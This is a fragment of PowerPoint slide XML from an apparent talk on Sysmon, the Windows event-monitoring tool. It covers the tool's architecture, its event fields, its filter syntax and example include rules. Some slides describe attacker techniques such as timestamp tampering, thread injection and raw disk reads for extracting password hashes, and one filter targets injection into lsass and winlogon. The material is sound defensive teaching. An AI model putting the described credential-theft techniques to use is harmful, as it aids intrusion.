              <a:t>Service doubles as command-line frontend</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Configuration stored in HKLM\System\CCS\Services\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SysmonDrv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\Parameters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27806" y="3787510"/>
            <a:ext cx="56665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864420" y="4019550"/>
            <a:ext cx="1762125" cy="80698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SysmonDrv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6680" y="2819399"/>
            <a:ext cx="1837456" cy="6381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Sysmon (Service)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36828" y="2819334"/>
            <a:ext cx="1837456" cy="6381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Sysmon (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Cmd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754" y="2681615"/>
            <a:ext cx="1757795" cy="9136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935" y="2787451"/>
            <a:ext cx="1343094" cy="702072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3" idx="2"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3745482" y="3489523"/>
            <a:ext cx="1" cy="53002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  <a:endCxn id="13" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4417029" y="3138487"/>
            <a:ext cx="29965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3" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2774284" y="3138422"/>
            <a:ext cx="299651" cy="65"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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2" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6554136" y="3138421"/>
            <a:ext cx="379618" cy="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286250" y="3489523"/>
            <a:ext cx="786759" cy="53002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7806" y="3510511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 Mode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27806" y="3808498"/>
            <a:ext cx="98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Kernel Mode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2099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 are specified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>as event field </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>conditions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Field is any field in event schema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Condition types can be used with any field</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buSzPct val="85000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8C2891"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eventtag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onmatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“include”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buSzPct val="85000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> condition=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>conditiontype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buSzPct val="85000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buSzPct val="85000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eventtag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="85258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426281"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6926843" y="1249579"/>
          <a:ext cx="165301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016">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1129304438"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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ConditionType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3649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2332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 not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93928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contains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924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excludes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5738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begin with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22207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end with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778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less</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> than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537851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more than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01876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image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72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159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69740" y="1066260"/>
            <a:ext cx="8423385" cy="3760272"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Generated from </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PsSetCreateProcessNotifyRoutine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PsSetCreateThreadNotifyRoutine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Image, command line, etc. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>captured from PEB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hashes captured by driver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ProcessGuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>LogonGuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> uniquely</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>identify process (PID and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>LogonId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can be reused)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5073009" y="1168892"/>
          <a:ext cx="1489074" cy="3291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9074">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1129304438"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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ProcessCreate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3649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UtcTime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2332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ProcessGuid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93928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924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Image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5738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CommandLine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22207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CurrentDirectory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778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537851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LogonGuid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01876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LogonId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79178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TerminalSessionId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591558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IntegrityLevel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3688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/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6650984" y="1166328"/>
          <a:ext cx="1482723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2723">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1129304438"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="26843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C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03649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Hashes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2332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ParentProcessGuid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93928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ParentProcessId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924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ParentImage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5738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ParentCommandLine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222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/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7348502" y="3089132"/>
          <a:ext cx="1489074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9074">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1129304438"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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ProcessTerminate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3649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UtcTime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2332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ProcessGuid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93928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924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Image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57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856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and Driver Loaded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Generated from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PsSetLoadImageNotifyRoutine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hash captured by driver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Signature captured by service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Image is process image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ImageLoaded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is driver/DLL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6926979" y="2030090"/>
          <a:ext cx="1489074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9074">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1129304438"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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DriverLoaded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3649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UtcTime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2332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ImageLoaded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93928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Hashes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924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5738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Signature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22207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5131321" y="1665957"/>
          <a:ext cx="1489074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9074">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1129304438"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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ImageLoaded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3649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UtcTime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2332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ProcessGuid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93928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924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Image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5738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ImageLoaded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22207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Hashes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688172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6503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Signatures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629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695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40" y="1066260"/>
            <a:ext cx="8423385" cy="39178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Generated by file system mini-filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File timestamps commonly changed</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by attackers covering their tracks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dropped files blend in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Altered files appear unchanged</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Watch for false positives:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ZIP extractors change timestamps to match</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>source files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browsers change timestamps to match</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>original file download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5879000" y="1456410"/>
          <a:ext cx="2195057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5057">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1129304438"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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File</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Creation Time Changed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3649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UtcTime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2332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ProcessGuid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93928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924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Image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5738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TargetFileName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22207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CreationUtcTime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778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PreviousCreationUtcTime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53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027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Forensic Monitoring Limitations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98501" y="1066258"/>
            <a:ext cx="8094623" cy="392994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When attackers or malware get on your network, you need to construct a timeline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What was the entry point?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Did it spread between systems?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What happened on a particular system?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Built-in Windows tooling make it hard to answer these questions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Limited information captured for process creates and DLL loading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network connection information simultaneously too limited and verbose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No way to capture common attacker behavior (e.g. thread injection)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4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40" y="1066260"/>
            <a:ext cx="8423385" cy="36687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Generated by service ETW tracing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Both UDP and TCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Includes DNS and port name </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>resolution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Initiated indicates process initiated</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TCP connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Recorded on first </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>process+source+dest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tuple observed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5073008" y="1168892"/>
          <a:ext cx="2099079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9079">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1129304438"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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Network Connection Detected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3649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UtcTime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2332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ProcessGuid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93928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924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Image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5738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22207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Protocol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778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Initiated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537851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SourceIsIpv6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01876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SourceIp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79178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SourceHostName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591558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SourcePort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36887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SourcePortName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446958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7308777" y="1168892"/>
          <a:ext cx="1621037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1037">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1129304438"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="26843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C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03649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DestinationIsIpv6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2332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DestinationIp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93928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DestinationHostName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924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DesinationPort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5738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DesinationPortName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2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5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41" y="1066260"/>
            <a:ext cx="5908512" cy="39886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Generated from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PsSetCreateThreadNotifyRoutine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> when source process different from thread process </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Start module determined from thread start address mapping to PEB loaded module list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Start function is reported if exact match to function in image export table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Common for malware injecting code into </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>another process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To cover tracks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To easily operate in target address space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There can be false positives: debuggers, crash dumps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6373907" y="1066260"/>
          <a:ext cx="2336460" cy="3291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36460">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1129304438"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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CreateRemoteThread</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                        <a:t> Detected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3649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UtcTime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2332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SourceProcessGuid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93928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SourceProcessId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924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SourceImage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5738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TargetProcessGuid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22207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TargetProcessId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778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TargetImage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537851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NewThreadId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01876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StartAddress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79178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StartModule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591558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StartFunction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36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096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Disk/Volume Read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41" y="1066260"/>
            <a:ext cx="5908512" cy="3340771"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Generated from file system mini-filter when volume/disk is opened directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Common for malware bypassing standard security protections/auditing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e.g. extracting password hashes from data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286616"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6392760" y="1321049"/>
          <a:ext cx="2336460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36460">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1129304438"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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RawReadAccess</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                        <a:t> Detected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36494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UtcTime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23325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ProcessGuid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93928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ProcessId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924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Image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57383"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2684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Device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2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519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Filter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01" y="1051089"/>
            <a:ext cx="8423385" cy="399881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Include only Google Chrome network activity:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1060704" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NetworkConnect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onmatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“include"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1060704" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    	&lt;Image condition="contains"&gt;chrome.exe&lt;/Image&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1060704" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NetworkConnect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Include thread injections into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>inlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1060704" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CreateRemoteThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onmatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="include"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1060704" lvl="4" indent="0">
              <a:buNone/>
